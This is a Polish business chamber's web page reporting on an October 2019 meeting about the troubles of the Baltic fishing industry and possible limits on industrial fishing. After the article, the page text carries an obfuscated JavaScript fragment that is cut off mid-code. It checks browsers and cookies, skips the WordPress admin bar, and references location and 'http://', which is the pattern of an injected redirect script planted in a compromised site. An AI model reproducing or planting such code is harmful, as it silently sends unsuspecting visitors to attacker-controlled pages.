Szanse i zagrożenia branży rybołówstwa w Polsce – relacja | Północna Izba Gospodarcza w Koszalinie

W dniu 5 października 2019 r.  o godzinie 11.00 w Restauracji Młyńskiej odbyło się drugie spotkanie projektu Extra SME dla branży akwakultury. W spotkaniu roboczym udział wzięli przedstawiciele rybołówstwa, przetwórców, związkowców, sympatyków i mediów.

Zebrani zostali przywitani przez Pana Prezesa Romana Biłasa, który potem moderował dyskusję. Celem drugiego spotkania było odniesienie się do pierwszego raportu z dnia 28 sierpnia, dotyczących bieżących problemów branży, z pomocą praktyków, aby ostateczne wnioski były w szczególności ich głosem i wskazywał konkretne obszary do poprawy.

W końcowej części spotkania Pan profesor Bogusław Liberadzki wspólnie z zebranymi zgodnie ustalił, że jeżeli nie ograniczymy połowu przemysłowego, nie odnowi się ekosystemu wodnego. Zamknięcie Morza Bałtyckiego jest ostatnim elementem, które można zrobić, jednak co w takiej sytuacji mają zrobić rybacy i przetwórcy? Czy w takiej sytuacji będzie możliwość, aby również przetwórcy mogli wystąpić o odszkodowania? Nikt z obecnych na spotkaniu nie chciałby, żeby branża rybołówstwa upadła w Polsce, jednak nie ma aktualnie żadnych regulacji co stanie się z jednostkami i kto będzie łowił surowiec za parę lat, jeżeli zamkniemy Morze Bałtyckie .

Wszyscy obecni zgodnie podkreślili, że Bałtyk powinien żywić – zachować zdolność do produkcji żywności.

Przygotowany raport zostanie wysłany do Ministerstwa Gospodarki Morskiej i Żeglugi Śródlądowej.

 

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m